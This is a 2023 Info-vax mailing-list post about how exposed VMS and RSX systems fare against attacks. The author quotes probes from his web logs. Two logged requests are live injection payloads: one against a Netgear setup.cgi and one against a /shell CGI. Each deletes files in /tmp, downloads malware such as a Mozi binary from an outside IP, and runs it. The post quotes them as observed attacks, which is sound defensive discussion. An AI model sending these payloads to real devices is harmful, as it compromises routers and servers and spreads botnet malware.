[Info-vax] Anti-virus ?

Johnny Billquist bqt at softjar.se
Mon Aug 14 07:12:32 EDT 2023 

On 2023-08-12 12:59, plugh wrote:
> On Saturday, August 12, 2023 at 3:41:28 AM UTC-7, Johnny Billquist wrote:
>> On 2023-08-11 19:35, Simon Clubley wrote:
>>> Oh, and BTW, judging by the fact Eisner has needed to be rebooted multiple
>>> times over the years due to various services locking up presumably due to
>>> attacks, I have little confidence that VMS in general would be robust
>>> within an actively hostile environment.
>> I think you are misinterpreting some data, as well as making some
>> assumptions that I don't think are correct.
>>
>> By the way, I have an RSX system publicly on the internet, and it's
>> totally without firewalls, and on 24/7. Mainly to actually harden it.
>> But it's basically running stable without any issues since many years.
>>
>> So much for "hostile environment" being such a big problem. (Although I
>> should admit that I don't have some of the fancy services that are easy
>> to exploit...)
>>
>> Johnny
> 
> It's that last part that is quite important these days. It's all about services now, as communication is so important. So much of this security stuff was known by Digital, such knowledge has simply been left to rot.

Oh. But it's not that I don't have any services... I do have some. But I 
guess it's a combination of me really into writing services that ever 
execute something passed in, with the assumption that it will look fine. 
I completely abhor the REST paradigm. It's such a poor idea from the 
start. (I don't start ranting about people who embrace it...)
The other part being that RSX is such an odd system to start with that 
pretty close to nobody even cares to try and figure out how to actually 
exploit anything. They are just running various scripts and tools that 
tries to exploit usual, well known issues in various services.

It's actually a very good way of finding out what issues are the most 
common ones. I get plenty of probes for things in wordpress for example. 
So that one seems popular (and bad). Netgear seems to also have some 
popular exploits. Then apparently just badly setup CGI stuff in general.

Examples:

. GET /wp-login.php

(seems to be just lots of these probing if wordpress is running on the 
host, so lots of variations on this one...)


. GET 
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http:/60.189.27.88:43788/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1

(I think we can safely assume thatn 60.189.27.88 isn't an official site 
of netgear configurations...)


. GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws

(Do people really setup their web servers to have shell as a CGI???)


Those are just a few examples from just a couple of hours of logs on my 
RSX machine...

   Johnny

More information about the Info-vax mailing list